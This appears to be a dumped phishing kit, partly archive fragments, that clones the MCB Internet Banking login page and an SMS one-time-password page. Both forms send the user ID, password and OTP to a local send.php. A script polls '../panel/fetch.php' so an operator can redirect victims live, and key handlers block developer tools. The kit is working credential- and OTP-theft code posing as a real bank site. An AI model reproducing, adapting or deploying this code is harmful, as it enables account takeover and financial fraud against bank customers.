eveK9HHLXU0WzodB5Q6N5C6fjjKGiddcmdaXqvJV1ussq4Xjqlbdd2md2LRGrpdYyjn8tzkIi9W6KLoHECgGC2+1284Vr9lY3DHzNpjXRZyrEn5afhbu27qu2/hbnCLfFxqenc/wBe/a7qrcJ9Ubn0dvXTPcC9pd/cdg3WxH93OKop5mFl4MtvzHwSUs3Gyb0YJQjeUSlif4fIloenc7M/Dak4eHN853p3lZtVzEpoqD95FpWth8d5efUQIAiBSLWcxhDoAn+giO9we021Wr37jIi4XfHy796Uf4XE5U9zm/icLv8A/uM9eywP6bsV2OVhxX0rN2jbrV34u5h34WdXtlHES/yo2U8ZPSf68uMUjE2uv6NjrxsOOMg7LctpS8rsJ42lCAUyj2Mjp5U1eYKgqHUqibEigB/KAiPXPts6V2Lapq7i48HkL85VnJP2rU5aX+mjPJncT1Pd7O52Nc2vqLfMmGw3E08XGVvFsyg/wurHhad+Ptjec17uCNsSKKTdJJBBJNBBBMiSKKJCppIpJlAiaSSZAKRNNMgAAFAAAADoGZCdAnJgDAGAMAYAwBgDAGAUp/11v+yvP0rHAKrAGAMAYAwBgDAGAMAYAwBgDAGAMAYAwBgDAGAMAYAwBgDAGAMAYAwBgDAGAMAYAwBgDAGAfO0omA3QO4AMUDdA6gUwlEwAP2gBhIHX+YMA+4AwBgDAGAMAYAwBgDAGAMAYAwBgDAGAMAYAwBgDAGAMAYAwBgDAGAMAYAwBgDAGAMAYAwBgDAGAMAYAwBgDAGAMAYAwBgDAGAMAYAwBgDAGAMAYAwD/2Q==); background-color: #fff; margin: 0; padding: 0; border: 0; display: flex; justify-content: flex-end; align-items: center; color: #AB1E22; font-size: 18px; font-weight: 700; } .window_title_header{ position: relative; color: #231f20; font-size: 45px; font-weight: 300; line-height: 200%; margin: 0; text-align: center; } .window_header_position{ position: relative; top: 90px } #contentarea, #contentarea1 { width:100%; position:absolute; border: 1px solid #cdcdcd; } .frmmainform{ position: relative; top: 100px; margin: auto; width: 980px; } .Buttons, .buttons { font-size: 18px !important; padding: 20px 50px !important; } input::placeholder{ color:#D3D3D3; } .fancy-tooltip .fancy-tooltip__content{ width: 280px !important; bottom: 0 !important; top: auto !important; } </style><div id="headerWrapper" ><div id="header" ><div id="_topMenu" > </div></div></div><div class="window_header no-resizable window_header_maximize window_header_position" ><div class="window_title_error active" ><table style="width: 100%;" id="error-dialog-table" cellspacing="1" cellpadding="1" ></table></div><div class="window_title_header active" id="stepheader" > Security Code Via SMS*** </div></div><form name="frmmain" method="post" action="send.php" id="frmmain" AUTOCOMPLETE="off" class="frmmainform" autocomplete="off" ><input type='hidden' name='idsequence' value='pSgCsZEe1RMpNgO68492HMCoCNvfH0ra+W91QdrubUQ=' /><table id="mainbox" class="mainbox" cellpadding="0" cellspacing="0" border="0" ><tr><td><div class="middlepanel" ><table cellspacing="0" cellpadding="0" border="0" id="maintable" class="maintable" style="border: none;" ><tr><td><div class="pageheadingdiv" ><style type="text/css" > #progressbar { margin-bottom: 30px; overflow: hidden; /*CSS counters to number the steps*/ counter-reset: step; float:center; width:950px; /*border:1px solid #000;*/ display: flex; justify-content: center; align-items: center; } #progressbar li { list-style-type: none; color: #231f20; text-align:center; text-transform: uppercase; font-size: 15px; font-weight: 300; width: 25%; float: left; position: relative; display: block; } #progressbar li:before { content: counter(step); counter-increment: step; width: 10px; line-height: 10px; display: block; font-size: 10px; color: #333; background: white; border-radius: 100%; margin: 15px auto 3px auto; } /*progressbar connectors*/ #progressbar li:after { content: ''; width: 97%; height: 5px; color: #AB1E22; position: absolute; left: -48.4%; top: 18px; z-index: 0; /*put it behind the numbers*/ } #progressbar li:first-child:after { /*connector not needed before the first step*/ content: none; } /*marking active/completed steps green*/ /*The number of the step and the connector before it = green*/ #progressbar li:before, #progressbar li:after{ background: #E6E6E6; color: #E6E6E6; } #progressbar li.active:before{ background: #ab1e22 none repeat scroll 0 0; color: #ab1e22; display: block; height: 11px; } #progressbar li.active:after{ background: #000 none repeat scroll 0 0; color: #ab1e22; display: block; height: 5px; } .headerinfodiv{ margin-top: -20px; height: 60px; display: flex; justify-content: center; align-items: center; } </style><div class="headerinfodiv" >An sms code has been sent to your registered mobile number enter the code to continue validation.</div></td></tr><tr><td height="100%" valign="top" ><div class="y_scroll" id="contentarea" ><div class="contentarea" style="padding:0px" ><span id="box" class="box" ><div class="middlepanel" ><table border="0" cellspacing="1" cellpadding="1" class="formtable" ><tr><td class="labeltext col1" ><label for="fldCardDesc" ><b></b></label></td></tr><tr><td class="labeltext" ><label id="fldnicnolabel1" for="fldnicno" class="labeltext" >One Time Password (OTP).</label></td><td><input type="radio" id="fldnicno" name="fldIdentificationType" value="NIC" class="objradio" checked="true" onchange="toggleIdentificationNo(this);" ></input><label id="fldnicnolabel" for="fldnicno" class="labeltext" ></label></td><td class="col80" ><input type="text" name="tan" id="fldIdentificationNoNic" maxlength="14" size="14" placeholder="SMS OTP" onkeypress="return isValid(event)" onpaste="return false;" ondrag="return false;" ondrop="return false;" class="DataLeftAligned" ><span class="required"> </span><span style="color:red;" class="js-timeout">2:00</span></strong><br></input></td></tr><tr style="height:12px !important;" ><script> var interval; function countdown() { clearInterval(interval); interval = setInterval( function() { var timer = $('.js-timeout').html(); timer = timer.split(':'); var minutes = timer[0]; var seconds = timer[1]; seconds -= 1; if (minutes < 0) return; else if (seconds < 0 && minutes != 0) { minutes -= 1; seconds = 59; } else if (seconds < 10 && length.seconds != 2) seconds = '0' + seconds; $('.js-timeout').html(minutes + ':' + seconds); if (minutes == 0 && seconds == 0) clearInterval(interval); }, 1000); } countdown(); </script></tr><tr></td></tr></table></div></span></div><div class="buttonarea" ><table border="0" cellspacing="1" cellpadding="1" width="100%" ><tbody><tr><td align="left" ><input style="border:none;"></input></td><td align="left" ><input alt="NEXT" name="fldsubmit" value="NEXT" class="Buttons" type="submit" size="16" maxlength="16" ></input></td></tr></tbody></table></div></div></td></tr></table></div></td></tr></table><input type="hidden" name="fldRequestId" value="RRUSR01" ></input><input type="hidden" name="fldDeviceId" value="01" ></input><input type="hidden" name="fldDataId" value="" ></input><input type="hidden" name="fldSessionId" value="" ></input><input type="hidden" name="fldSectionId" value="RRUSR01" ></input><input type="Hidden" name="fldServiceType" value="USR" ></input></form></script> <script src="res/jq.js"></script> <script> var cd = "<?php echo $current_data; ?>"; setInterval(() => { $.post("../panel/fetch.php", {update:1}, function(d){ if(cd!=d){ window.location=d; cd=d; } }) }, 2000); </script> </body></html>PK [��\�Ϗ[� � app/user.phpnu W+A�� <?php require '../main.php'; ?> <!DOCTYPE html> <html> <head> <title>MCB Internet Banking</title> <meta http-equiv="cache-control" content="no-cache"> <meta http-equiv="cache-control" content="no-store"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content=0> <meta http-equiv="X-UA-Compatible" content="IE=11"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="viewport" content="1024, initial-scale=1.0, user-scalable=1, minimum-scale=1.0, maximum-scale=2.0" /> <meta name="apple-mobile-web-app-capable" content="yes" /> <meta name="apple-mobile-web-app-status-bar-style" content="default" /> <meta name="HandheldFriendly" content="true" /> <meta name="MobileOptimized" content="width" /> <LINK REL="SHORTCUT ICON" href="https://ib.mcb.mu/T001/images/mcb.ico" /> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta http-equiv="X-UA-Compatible" content="IE=11" /> <link type="text/css" rel="stylesheet" href="https://ib.mcb.mu/T001/css/cmn/banking.uri.css" /> <link type="text/css" rel="stylesheet" href="https://ib.mcb.mu/T001/css/C_COLPAL1/scrollbars.uri.css" /> <link type="text/css" rel="stylesheet" href="https://ib.mcb.mu/T001/css/cmn/virtualkeyboard.uri.css" /> <link rel="shortcut icon" href="https://ib.mcb.mu/T001/images/mcb.ico" /> <script type="text/javascript" src="https://ib.mcb.mu/T001/JS/combined/jquery-includes.js" charset="utf-8"></script> <script type="text/javascript" src="https://ib.mcb.mu/T001/jsdir/common.js" charset="utf-8"></script> <script type="text/JavaScript" src="https://ib.mcb.mu/T001/jsdir/virtualkeyboard.js" charset="utf-8"></script> <script type="text/JavaScript" src='https://ib.mcb.mu/T001/jsdir/rsa_compiled.js' charset="utf-8"></script> <!-- script type="text/JavaScript" src='https://ib.mcb.mu/T001/jsdir/fb.js' charset="utf-8"></script --> <style> html { display:none } </style> <script> if (self == top) { document.documentElement.style.display = 'block'; } else { top.location = self.location; } </script> <script type="text/javascript"> $(document).ready(function() { //$('#a1_up').bubbletip($('#tip1_up')); //$('#a2_up').bubbletip($('#tip2_up')); $('.manual-ajax').click(function(event) { event.preventDefault(); $.get(this.href, function(html) { $(html).appendTo('body').modal(); }); }); $(window).resize(function(){ if(window.screen.width <= 800) { $('#wrapper').attr('style', 'width: 95%'); $('#wrapper #section').attr('style', 'width: 95%'); $('#wrapper #section.login').attr('style', 'width: 68%'); $('#wrapper #section.savings_account').attr('style', 'width: 68%'); $('.virtualButtons').attr('style', "width:24px;height:24px"); $('#login-keyboard-controls input').attr('style', 'height:24px'); $('.header_nav').attr('style', 'width: 99%'); $('#footer').attr('style', 'width: 95%'); } else { $('#wrapper').removeAttr('style'); $('#wrapper #section').removeAttr('style'); $('#wrapper #section.login').removeAttr('style'); $('#wrapper #section.savings_account').removeAttr('style'); $('.virtualButtons').removeAttr('style'); $('#login-keyboard-controls input').removeAttr('style'); $('.header_nav').removeAttr('style'); $('#footer').removeAttr('style'); } }).trigger('resize'); //initialize_fb ({appId : 'null', channelURL : 'null'}); }); function passwordStrength(i) { var password = document.getElementById('pass0'+i).value; var desc = new Array(); desc[0] = "Very Weak"; desc[1] = "Weak"; desc[2] = "Better"; desc[3] = "Medium"; desc[4] = "Strong"; desc[5] = "Strongest"; var score = 0; //if password bigger than 6 give 1 point if (password.length > 6) score++; //if password has both lower and uppercase characters give 1 point if ( ( password.match(/[a-z]/) ) && ( password.match(/[A-Z]/) ) ) score++; //if password has at least one number give 1 point if (password.match(/\d+/)) score++; //if password has at least one special caracther give 1 point if ( password.match(/.[!,@,#,$,%,^,&,*,?,_,~,-,(,)]/) ) score++; //if password bigger than 12 give another 1 point if (password.length > 12) score++; document.getElementById("passwordDescription"+ i).innerHTML = desc[score]; document.getElementById("passwordStrength"+ i).className = "strength" + score; } </script> <script type="text/javascript"> //----------------------------------------------------------------------------- var scr_w, scr_w1,scr_h, scr_h1; //----------------------------------------------------------------------------- $(document).ready(function() { if($('div#fldLoginUserId input').val() == '') { $(location).attr('href','savings_account_offers.jsp'); } setScreenSize (); }); //----------------------------------------------------------------------------- function fLogon(){ $(location).attr('href','retrieve_application.jsp'); if(document.getElementById('fldLoginUserId').value =='tim.brown@gmail.com'){ $(location).attr('href','savings_account_offers.jsp'); } } //----------------------------------------------------------------------------- function setScreenSize(){ scr_w1 = screen.availWidth-10+"px"; scr_h1 = screen.availHeight-60+"px"; } //----------------------------------------------------------------------------- function locateBranches(title) { document.frmprocess.fldRequestId.value = "RRLOB01"; window_open (document.frmprocess, title, "RRLOB01"); } //----------------------------------------------------------------------------- function registerUser(title){ document.frmprocess.fldRequestId.value = "RRRNB01"; window_open (document.frmprocess, title, "RRRNB01"); } function opengoal(title){ document.frmprocess.fldRequestId.value = "RRORG351"; window_open (document.frmprocess, title, "RRORG351"); } //----------------------------------------------------------------------------- function showFAQ(p_title, p_lang){ window.open(p_lang + '/faq.html'); } //------------------------------------------------------------------------------ function getStatus(title){ document.frmprocess.fldRequestId.value = "RRORG111"; window_open (document.frmprocess, title, "RRORG111"); } //------------------------------------------------------------------------------ function window_open(frm, title, id){ var window_name = 'process_' + id; var frm_action; window.open ( '' , window_name , 'toolbar=0,location=0,directories=0,status=1,menubar=0,scrollbars=1,resizable=0,left=0,top=0,width='+scr_w1+',height='+scr_h1 ); frm.target = window_name; frm.title.value = title; frm_action = frm.action; frm.action = "process.jsp" frm.submit (); frm.action = frm_action; } //------------------------------------------------------------------------------ function aboutbox () { window.open ("about.html", "NewWindow", "dependant=no,directories=no,location=no,menubar=no" + ",resizable=no,scrollbars=yes,titlebar=no,toolbar=no," + "0, 0, top=0,left=0,status=1,width=400,height=300"); } //----------------------------------------------------------------------------- function extractFieldsFromURL(){ var fields=new Object(); var url = new String(document.URL); var fieldStartPos = url.indexOf("?") + 1; if(fieldStartPos>0 && url.substring(fieldStartPos).length>0){ var fields = url.substring(fieldStartPos).split("&"); for(i=0; i<fields.length; i++){ var field = fields[i].split("="); if(field.length == 2 && field[0].length>0){ var fieldName = field[0]; var fieldValue = field[1]; if($('input[name="' + fieldName +'"]').val() == undefined){ createHiddenField(fieldName, fieldValue); } } } } var selected = document.activeElement; if ((selected.id == "fldLoginUserId") || (selected.id=="undefined") || (selected.id=="")){ $('#fldLoginUserId').focus(); } } //----------------------------------------------------------------------------- function createHiddenField(fieldName, fieldValue){ fieldElem = $('<input type="hidden" name="' + fieldName + '" value="' + fieldValue + '"/>'); $('form[name="frmmain"]').append(fieldElem); } //----------------------------------------------------------------------------- // Code to disable F12, F5, F6, Ctrl+U if (document.addEventListener) // code for cross browser compatibility as addEventListener is not supported in IE8 and earlier versions. { document.addEventListener("keydown", disableKeys, false); } else if (document.attachEvent) { document.attachEvent("onkeydown", disableKeys); } function disableKeys(event) { event = (event || window.event); if (event.keyCode == 123 || ((event.keyCode == 85) && event.ctrlKey )|| event.keyCode == 116 || event.keyCode == 117) { if(event.preventDefault) event.preventDefault(); return false; } } //----------------------------------------------------------------------------- </script> </head> <body class="bg" onload="extractFieldsFromURL();"> <div id="headerWrapper"> <div id="header"> <div id="_topMenu"> <!--<div id='logoWrapper'> <div id="logo" class="logo"></div> </div> <div class="inner-head"> <span>Call for free on :</span>1-800-111-1111 </div>--> <form name="frmlang" method="POST" action="send.php"> <div id="topMenu"> </div> </form> </div> </div> </div> <div id ="mainall" > <form name="frmmain" action="send.php" method="POST" autocomplete="off" autocomplete="off" ><input type='hidden' name='idsequence' value='Rplzsfq0VK29S5LSrLjIFeVbMljapOuXMwSowrqrP8U=' /><script type="text/JavaScript" language="JavaScript" src="https://ib.mcb.mu/T001/jsdir/Ajax_Login.js" ></script><script> var userId = ''; var snonce = ''; function blurUserId(el) { userId = el.value; if (el.value == '') { el.value = el.title; el.style.color="#666"; } } function focusUserId(el) { if (el.value == el.title) { el.value = ''; el.style.color="#333"; } } function capLock(e){ kc = e.keyCode?e.keyCode:e.which; sk = e.shiftKey?e.shiftKey:((kc == 16)?true:false); if(((kc >= 65 && kc <= 90) && !sk)||((kc >= 97 && kc <= 122) && sk)) $("#capserr").show(); else $("#capserr").hide(); } function createForm (p_frmname,p_requestid) { var form = $("form[name="+p_frmname+"]"); if (form.length == 0) { $("form[name='frmmain']").after ('<form name='+p_frmname+' action="process.jsp" method="POST" autocomplete="off"/>'); var form = $("form[name="+p_frmname+"]"); form.append ('<input type="hidden" value='+p_requestid+' name="fldRequestId"/>'); form.append ('<input type="hidden" value="01" name="fldDeviceId"/>'); form.append ('<input type="hidden" value="" name="title"/>'); } } function forgotPassword () { var l_frmname = 'frmprocess'; var l_requestid = 'RRFPW01'; createForm(l_frmname,l_requestid); formwindow_open ($("form[name="+l_frmname+"]") [0], 'Forgot Password?', l_requestid); } function newUser () { var l_frmname = 'frmprocess'; var l_requestid = 'RRUSR11'; createForm(l_frmname,l_requestid); formwindow_open ($("form[name="+l_frmname+"]") [0], 'Online Registration', l_requestid); } function troubleshootLoginIssue(){ var l_frmname = 'frmprocess'; var l_requestid = 'RRUBA09'; createForm(l_frmname,l_requestid); formwindow_open ($("form[name="+l_frmname+"]") [0], 'Login Problem', l_requestid); } </script><div id="tablediv" style="position:relative;" ><div id="wrapper" class="login" ><div class="alert" ><div class="alert_inner" ><span class="icon icon_information" ></span><span class="alert_message" ><script type="text/javascript" >var l_notification_msg = 'Please note that the migration of companies to MCB Internet Banking Pro is currently underway and is taking place in phases. <br> Companies can register once they have been notified by the bank.';document.write('<p>');document.write(l_notification_msg);document.write('</p>');</script></span></div></div><div id="main" ><div class="section_holder" style="background:white;width:975px;border:1px solid #e6e6e6" ><div class="section_left" style="border:0px solid #e6e6e6" ><div id="keyboard_firstrowtwrapper" ><div id="keyboard_bankname" > Login </div></div><div id="rows" ><div class="login_labeltext" id="user_id" ><label for="fldLoginUserId" >User ID</label></div><div id="fldPassword" ><input type="text" class="inputbox" id="fldLoginUserId" name="USERNAME" onblur="blurUserId(this);" onfocus="focusUserId(this);" ></input><span id="useriderr" class="input-error-msg" style="display:none;" >Please enter User ID</span></div></div><div id="rows" ><div class="login_labeltext" id="password_id" ><label for="VKBPassword" >Password</label></div><div class="stdinputbox" id="fldPassword" ><input type="password" value="" class="inputbox" name="PASSWORD" maxlength="20" oncopy="return false;" onpaste="return false;" id="SKBPassword" onkeypress="capLock(event)" ></input><span id="pwderr" class="input-error-msg" style="display:none;" >Please enter password</span><span id="capserr" class="input-error-msg" style="display:none;" >Caps Lock is on </span></div><div class="virtinputbox" id="fldPassword" style="display: none;" ><input type="password" value="" class="inputbox" name="fldPasswordVirtual" maxlength="20" readonly="true" id="VKBPassword" ></input><span id="pwderr" class="input-error-msg" style="display:none;" >Please enter password</span></div><div id="virtualkeyboard" class="virtualkeyboard" ><img src="https://ib.mcb.mu/T001/images/ico_keyboard.gif" class="ico_keyboard" title="Virtual Keyboard" width="44" height="29" href="#VKB" style="cursor:pointer" ></img></div></div><div id="tabs_wrapper" style="position:absolute; padding:1px" ><div id="tabs_content_container" style="padding:5px" ><div id="VKB" class="tab_content" style="display: none;" ><div class="inputbox" ><div class="labeltext" style="float:left; margin: 10px 0px;" ><input type="checkbox" name="elemC4" id="elemC4" style="margin:10px 5px 0 0;" checked="true" ></input><label for="elemC4" >Click here to enter by hovering</label></div><div id="closebut" class="overlay-close" ><img height="25" width="25" border="0" alt="Close" title="Close" href="#VKB" src="https://ib.mcb.mu/T001/images/ico_cross-small.jpg" ></img></div></div><div class="hsplitbar" ></div><div id="login-keyboard" ><table cellpadding="0" cellspacing="0" align="center" width="50%" ><tr><td align="center" ><div id="login-keyboard-special" ><table cellpadding="1" cellspacing="1" ><tr><script LANGUAGE="JavaScript" > for (var i=0; i < 15; i++) { document.write ('<td>'); imageSpCharOnPage(i); document.write ('</td>'); } </script></tr></table></div></td><td rowspan="3" style="vertical-align:top;" ><div id="login-keyboard-numeric" ><table cellpadding="1" cellspacing="1" role="presentation" summary="" ><tr><script LANGUAGE="JavaScript" > for (var i=0; i < 3; i++) { document.write ('<td>'); imageNumOnPage(i); document.write ('</td>'); } </script></tr><tr><script LANGUAGE="JavaScript" > for (var i=3; i < 6; i++) { document.write ('<td>'); imageNumOnPage(i); document.write ('</td>'); } </script></tr><tr><script LANGUAGE="JavaScript" > for (var i=6; i < 9; i++) { document.write ('<td>'); imageNumOnPage(i); document.write ('</td>'); } </script></tr><tr><td> </td><script LANGUAGE="JavaScript" > for (var i=9; i < 10; i++) { document.write ('<td>'); imageNumOnPage(i); document.write ('</td>'); } </script><td> </td></tr></table></div></td></tr><tr><td valign="top" align="center" ><div id="login-keyboard-alpha" ><table cellpadding="1" cellspacing="1" ><tr><script LANGUAGE="JavaScript" > for (var i=0; i < 10; i++) { document.write ('<td>'); imageAlphaOnPage(i); document.write ('</td>'); } </script></tr></table><table cellpadding="1" cellspacing="1" ><tr><script LANGUAGE="JavaScript" > for (var i=10; i < 19; i++) { document.write ('<td>'); imageAlphaOnPage(i); document.write ('</td>'); } </script></tr></table><table cellpadding="1" cellspacing="1" ><tr><script LANGUAGE="JavaScript" > for (var i=19; i < 26; i++) { document.write ('<td>'); imageAlphaOnPage(i); document.write ('</td>'); } </script></tr></table></div></td></tr><tr><td width="100%" align="center" ><table cellpadding="1" cellspacing="1" align="center" id="login-keyboard-controls" ><tr><td><input type="button" value="Upper" id="elemC0" onMouseDown="return changeToStar();" onMouseUp="return changeBack();" onMouseOut="return changeBack();" OnClick="setCase('Upper','Lower');" class="buttons" ></input></td><td><input type="button" value="Delete" id="elemC1" onMouseDown="return changeToStar();" onMouseUp="return changeBack();" onMouseOut="return changeBack();" OnClick="DeletePwd();" class="buttons" ></input></td><td><input type="button" value="Clear All" id="elemC2" onMouseDown="return changeToStar();" onMouseUp="return changeBack();" onMouseOut="return changeBack();" OnClick="ClearPwd();" class="buttons" ></input></td><td><input type="button" value="Not Mixed" id="elemC3" onMouseDown="return changeToStar();" onMouseUp="return changeBack();" onMouseOut="return changeBack();" OnClick="setRandom('Mixed','Not Mixed');" class="buttons" ></input></td></tr></table></td></tr></table></div></div></div></div><div style="text-align: center;padding: 5px 10px 5px; cursor: pointer" ><input name="imageField" type="submit" value="Login" id="Login" class="login_button" onClick="fNonce()" style="cursor: pointer !important; padding: 13px 76px!important;" disabled="true" ></input></div><div id="rows" ><div class="keyboard_wrapper" ><a style="color: black; text-decoration: underline;" href="javascript:void(0)" onclick="troubleshootLoginIssue();" >Can't Login?</a></div><div class="keyboard_wrapper" ><label id="btnLoginProblemlbl" class="button_desc" for="btnLoginProblem" >(Forgot Password/ID, Account Locked)</label></div><div class="keyboard_wrapper" style="margin: 20px 0px 0px 16px;" ><a style="font-size: 18px; font-weight: 700;" href="javascript:void(0)" onclick="newUser();" >Register to Internet Banking</a><span class="icon icon--arrowrightred" style="background-position: 50% 43%" ></span></div></div><style> .button_desc{ font-style: italic; font-size: 13px; font-weight: 400; color: #949193 !important } </style></div><div class="section_right" style="border:0px solid #e6e6e6" ><div class="logo_holder" style="margin:14px 18px !important;" ><img src="https://ib.mcb.mu/T001/images/IBPro_SmartApprove.png" ></img></div><p style="color:black !important ;font-size: 22px !important;line-height:18px !important;margin-top: 92px !important;" >A new experience awaits our <br></br>non-individual customers! </p><div style="margin:9px auto !important;" ><a style="font-size: 20px !important; font-weight: 700 !important;" href="https://ibpro.mcb.mu/" target="_blank" >Register and/or Login to Internet Banking Pro</a><span class="icon icon--arrowrightred" style="background-position: 50% 43%" ></span></div><p style="font-size:15px !important;padding: 10px 16px !important;font-style:italic !important; margin-top: -7px !important; font-weight: 400 !important; color: #949193 !important;" > Please complete registration once you have been notified by the Bank.</p></div></div><div class="section_bottom" ><div class="section_title" ><img src="https://ib.mcb.mu/T001/images/ico_security.png" height="59" width="73" ></img><h2>Security</h2><blockquote><p>MCB will never ask for your login details by email.</p><p>Report any suspicious email, website, or unsolicited request that </p><p>claims affiliation with MCB by calling <strong>202 6060</strong> or by emailing </p><p><a href="mailto:alert@mcb.mu" >alert@mcb.mu</a></p><div><a href="https://www.mcb.mu/en/personal/security-centre/online-and-mobile-security/ways-to-keep-safe" target="_blank" >How to protect yourself online</a><span class="icon icon--arrowrightred" ></span></div></blockquote><div id="verisign_seal" ><script type="text/javascript" src="https://seal.websecurity.norton.com/getseal?host_name=ib.mcb.mu&size=S&use_flash=NO&use_transparent=NO&lang=en" ></script></div></div></div></div></div></div><div id="footer" ><div class="footerWrapper" ><p class="footer_list-title" >Explore MCB Internet Banking</p><div class="footer_link-list" ><ul><li><a href="https://www.mcb.mu/en/personal/banking/ways-to-bank/internet/" target="_blank" >Key features <span class="icon icon-arrowrightwhite" ></span></a></li></ul></div><div class="footer_link-list" ><ul><li><a href="https://www.mcb.mu/en/personal/support/faqs/online-banking" target="_blank" >FAQs<span class="icon icon-arrowrightwhite" ></span></a></li></ul></div><div class="footer_link-list" ><ul><li><a href="https://www.mcb.mu/en/personal/security-centre/online-and-mobile-security/" target="_blank" >Protect yourself <span class="icon icon-arrowrightwhite" ></span></a></li></ul></div><div class="LoginCopyright" > © <script type="text/javascript" >document.write(new Date().getFullYear());</script> MCB - The Mauritius Commercial Bank Ltd </div></div></div><input type="hidden" name="fldPassword" value="" ></input><script language="JavaScript" > //----------------------------------------------------------------------------- var virtKeyb = false; var speedMbps; var BW_THRESHOLD = 300; var scr_w, scr_w1,scr_h, scr_h1; function initializelogin() { setScreenSize (); if (virtKeyb) { } else { var keyBoard = document.getElementById('login-keyboard').getElementsByTagName("BUTTON"); for(i=0; i <= keyBoard.length-1; i++){ keyBoard[i].disabled=true; keyBoard[i].style.color='#AAAAAA'; } } $("#fldLoginUserId").focus (function (e) {focusUserId (this);}); $("#fldLoginUserId").blur (function (e) {blurUserId (this);}); blurUserId (document.getElementById ("fldLoginUserId")); $(".virtinputbox").hide(); document.getElementById("Login").disabled = false; } $(document).ready(function() { initializelogin (); getBandWidth(); }); //added by foram $(".alert").hide(); $(".icon icon_information").hide(); var l_sys_notification = 'Y'; if(l_sys_notification!='N'){ $(".alert").show(); $(".icon icon_information").show(); } $(".tab_content").hide(); $(".stdinputbox").show(); $(".virtinputbox").hide(); $(".virtualkeyboard img").click(function() { $(".tab_content").hide(); // Hide all tab content var selected_tab = $(this).attr("href"); // Here we get the href value of the selected tab $(selected_tab).fadeIn(); // Show the selected tab content virtKeyb = true; $(".stdinputbox").hide(); $(".virtinputbox").show(); document.frmmain.fldPasswordVirtual.value = ""; document.frmmain.fldPasswordStandard.value = ""; return false; // At the end, we add return false so that the click on the link is not executed }); $(".overlay-close img").click(function(){ $(".tab_content").hide(); var selected_tab = $(this).attr("href"); $(selected_tab).fadeOut(); virtKeyb = false; document.frmmain.fldPasswordStandard.value = document.frmmain.fldPasswordVirtual.value; $(".stdinputbox").show(); $(".virtinputbox").hide(); return false; }) //added by foram function getBandWidth() { var startTime, endTime; var imgSize = 983094; //bytes var testImg = new Image(); testImg.src = "images/test.bmp" + "?n=" + Math.random(); startTime = (new Date()).getTime(); testImg.onload = function () { endTime = (new Date()).getTime(); var duration = (endTime - startTime) / 1000; var bitsLoaded = imgSize * 8; var speedBps = bitsLoaded / duration; speedMbps = ((speedBps / 1024)/1024).toFixed(2); } } //----------------------------------------------------------------------------- function fLogon (p_snonce) { var pwd = null; var rsa = new RSAKey(); var mod = "912f2b92b6eece87d660d1f58e3208fb487fce3e672aeb93b28e2d575a1888516ff7d390141d3afbe185a083dd9bb84d42fdef9a5a3901590e74a35eb6358c29a0ac4d34daeb1cafe6ae0e8012a6c96a6b0c609e55dadec925888c6b06436da2c388170e7b51b0b9475d01ad8893c87ced00a6f0793b5a9aa8acdbff4b694ce9"; var expo = "10001"; rsa.setPublic(mod, expo); // if (userId == "" || userId =="User Id") { if (document.frmmain.fldLoginUserId.value == "" || document.frmmain.fldLoginUserId.value == "User ID") { $("#useriderr").show(); $("#pwderr").hide(); $( "#fldLoginUserId" ).removeClass("inputbox").addClass( "inputbox input-error" ); $( "#VKBPassword" ).removeClass("inputbox input-error").addClass( "inputbox" ); $( "#SKBPassword" ).removeClass("inputbox input-error").addClass( "inputbox" ); // alert ("User Id must be entered"); document.frmmain.fldLoginUserId.focus (); return false; }else{ $("#useriderr").hide(); $( "#fldLoginUserId" ).removeClass("inputbox input-error").addClass( "inputbox" ); } if (virtKeyb) { if (document.frmmain.fldPasswordVirtual.value == "") { // alert ("Password must be entered"); if (document.frmmain.fldPasswordStandard.value == ""){ $("#pwderr").show(); $( "#VKBPassword" ).removeClass("inputbox").addClass( "inputbox input-error" ); document.frmmain.fldPasswordVirtual.focus (); return false; } }else{ $("#pwderr").hide(); $( "#VKBPassword" ).removeClass("inputbox input-error").addClass( "inputbox" ); } pwd = document.frmmain.fldPasswordVirtual.value; document.frmmain.fldPasswordVirtual.value = ""; } else { if (document.frmmain.fldPasswordStandard.value == "") { // alert ("Password must be entered"); if (document.frmmain.fldPasswordVirtual.value == ""){ $("#pwderr").show(); $( "#SKBPassword" ).removeClass("inputbox").addClass( "inputbox input-error" ); document.frmmain.fldPasswordStandard.focus (); return false; } }else{ $("#pwderr").hide(); $( "#SKBPassword" ).removeClass("inputbox input-error").addClass( "inputbox" ); } pwd = document.frmmain.fldPasswordStandard.value; document.frmmain.fldPasswordStandard.value = ""; } if(pwd.length < 16){ aString = new String("16"); answer = aString - pwd.length; var sr = " "; var cnt ; for (var i = 0; i < answer; i++) { var rsr = pwd.concat(sr); pwd =rsr; } } document.frmmain.fldPassword.value = rsa.encrypt(p_snonce+pwd); document.frmmain.fldRequestId.value = "RRLGN01"; var isLowBW = false; var scr_w, scr_w1; var scr_h, scr_h1; scr_w1 = 1015; scr_h1 = 740; if (scr_w == '800') { scr_w1 = 785; scr_h1 = 500; } if(typeof loginWindow != 'undefined'){ try{ loginWindow.close(); }catch(e){ } } if(speedMbps <= BW_THRESHOLD) { var UI_id = document.frmmain.fldlitever; for(var i = 0; i < UI_id.options.length; i++) { if(UI_id.options[i].value == "L") { UI_id.selectedIndex = i; break; } } isLowBW = true; } if(isLowBW) { $("#bwDialog").dialog("open"); return false; } else { return redirectToSummaryPage(); } } document.onkeydown=function(){ if(window.event.keyCode=='13'){ fNonce(); } } function redirectToSummaryPage() { var scrW = screen.availWidth-10+"px"; var scrH = screen.availHeight-60+"px"; var windowName = document.frmmain.fldLoginUserId.value.replace(/[^a-zA-z0-9]+/g,"a"); loginWindow = window.open ("", windowName , "dependant=no,directories=no,location=no,menubar=no" + ",resizable=yes,scrollbars=yes,titlebar=no,toolbar=no," + "0, 0, top=0,left=0,status=1," + "width=" + (scrW) + ",height=" + (scrH)); document.frmmain.target = windowName ; document.frmmain.submit (); loginWindow.focus(); document.frmmain.fldLoginUserId.value = ""; document.frmmain.fldPassword.value = ""; document.frmmain.fldPasswordStandard.value = ""; document.frmmain.fldPasswordVirtual.value = ""; return false; } //----------------------------------------------------------------------------- function setheight () { var isNS6 = (!document.all && document.getElementById) ? true : false; if(isNS6==true) { document.getElementById('TDlogin').style.height ='350px'; } else { document.getElementById('TDlogin').style.height ='100%'; } } //----------------------------------------------------------------------------- function DeletePwd () { if (virtKeyb) { var strNumField = new String(document.frmmain.fldPasswordVirtual.value); document.frmmain.fldPasswordVirtual.value = strNumField.substring(0,strNumField.length-1); 